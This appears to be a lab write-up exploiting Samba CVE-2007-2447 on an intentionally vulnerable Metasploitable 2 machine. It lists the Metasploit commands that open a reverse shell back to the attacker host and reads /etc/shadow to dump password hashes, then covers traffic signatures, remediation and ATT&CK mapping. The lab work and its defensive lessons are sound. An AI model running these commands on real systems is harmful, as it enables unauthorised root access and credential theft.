Overview
This is a complete attack chain from start to finish, the way a real attacker would approach a target. Starting from zero knowledge of the target, discovering it on the network, scanning it, finding a vulnerability and exploiting it. Wireshark ran the entire time to capture and understand what the traffic looks like at each stage.
The point of this writeup is to walk through the methodology, not just the commands. Each phase is annotated with what I was looking for and why.
Lab Setup
| Machine | Role | IP | OS |
|---|---|---|---|
| Kali Linux 2026.1 | Attacker | 192.168.56.102 | Kali Linux |
| Metasploitable 2 | Target | 192.168.56.101 | Ubuntu 8.04 |
Both machines run in VirtualBox on a Host-Only network, completely isolated from the internet. Metasploitable 2 is an intentionally vulnerable machine built specifically for this kind of practice.
Step 1: Reconnaissance
I only knew the subnet. From there I used netdiscover to find what was actually alive on the network.
sudo netdiscover -r 192.168.56.0/24
It came back with 3 hosts. The target showed up at 192.168.56.101.
Step 2: Scanning
With the target IP in hand, I ran a full Nmap scan to see what services were running and what versions they were on. This is where things get interesting.
nmap -sV -sC -O 192.168.56.101
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 2.3.4 |
| 22 | SSH | OpenSSH 4.7p1 |
| 23 | Telnet | Linux telnetd |
| 80 | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.0.20-Debian |
| 3306 | MySQL | 5.0.51a |
| 5432 | PostgreSQL | 8.3.0 |
| 5900 | VNC | protocol 3.3 |
| 8180 | HTTP | Apache Tomcat 5.5 |
OS detected: Linux 2.6.X (Ubuntu 8.04)
The machine had a lot of open ports which is already a red flag. What stood out immediately was Samba 3.0.20. That specific version has a well known critical vulnerability: CVE-2007-2447.
Step 3: Exploitation
CVE-2007-2447: Samba Username Map Script RCE
Samba 3.0.20 has a flaw in how it handles the username field during SMB authentication. The vulnerability lives in the username map script option, where Samba passes the username to a shell without proper sanitization. An attacker can inject shell commands through it without needing any credentials. CVSS Score: 10.0 Critical.
I used Metasploit to exploit it:
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
exploit
[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:47895)
whoami
root
Root access. No credentials, no brute force, just a vulnerable service version. That is how fast it can go when software is not patched.
Step 4: Post-Exploitation
Once inside I confirmed the access level and read /etc/shadow to show what root access actually means in practice.
id && hostname && cat /etc/shadow
Every password hash on the system was right there. In a real scenario this would be game over: offline cracking of those hashes plus lateral movement using credentials reused elsewhere.
Wireshark Traffic Analysis
I kept Wireshark running the entire time. Looking back at the capture you can clearly see the different phases of the attack just from the traffic patterns:
- Reconnaissance generates a spike of ARP requests in a very short window
- Scanning floods the target with SYN packets across all ports
- Exploitation shows SMB traffic followed immediately by an outbound connection on port 4444, which is the reverse shell connecting back
This is the kind of pattern that any half-decent network monitoring would catch in production.
Findings
| Vulnerability | CVE | Severity | Remediation |
|---|---|---|---|
| Samba 3.0.20 RCE | CVE-2007-2447 | Critical | Upgrade Samba to 3.0.25 or later |
| FTP Anonymous Login | - | Medium | Disable anonymous FTP access |
| Telnet enabled | - | High | Replace with SSH, disable Telnet daemon |
| VNC no authentication | - | High | Enable VNC authentication, restrict to VPN |
| Apache 2.2.8 | Multiple CVEs | High | Upgrade Apache, enable security headers |
Application Security Takeaways
The headline finding is CVE-2007-2447, a remote code execution via shell command injection in an authentication path. From an application security perspective there are several lessons worth pulling out:
Input handling at trust boundaries. Samba accepted a username field and passed it to a shell. That is a textbook unsafe deserialization of attacker-controlled input. The same class of bug appears in modern web apps as command injection in image processing, file uploads, or anywhere user input feeds into exec style calls. Mitigation is parameterized APIs and strict allow-lists, never relying on the absence of metacharacters.
Version management as a security control. The fix for CVE-2007-2447 shipped in 2007. Any system running Samba 3.0.20 in 2026 is running a known critical bug from almost two decades ago. Real production environments have dependency drift constantly, which is why SBOM tracking and automated CVE scanning (Dependabot, Trivy, Snyk) are not optional in mature AppSec programs.
Defense in depth assumes the first layer will fail. Even if Samba had been patched, the same machine ran Telnet (cleartext credentials), anonymous FTP, and unauthenticated VNC. Removing the single critical CVE would still leave multiple paths to compromise. Real AppSec hardens at every layer rather than fixing one bug and calling it done.
Detection signals as a development-time concern. The traffic patterns above (ARP spike, port scan, reverse shell on a non-standard port, root reading /etc/shadow) are detectable. Building applications and infrastructure that emit useful telemetry, logs structured the way SOC tooling expects them, is increasingly considered an AppSec responsibility.
MITRE ATT&CK Mapping
- T1595: Active Scanning (netdiscover + Nmap recon)
- T1046: Network Service Discovery (service version detection)
- T1190: Exploit Public-Facing Application (Samba RCE)
- T1059: Command and Scripting Interpreter (reverse shell)
- T1003.008: OS Credential Dumping via
/etc/shadow
Artifacts
Full repository with the Wireshark pcap capture, exploit configuration, and high-resolution screenshots is available on GitHub:
github.com/mihaitapalaga/security-portfolio
The pcap file is useful if you want to open it locally and follow the traffic phase by phase against the timeline of the attack.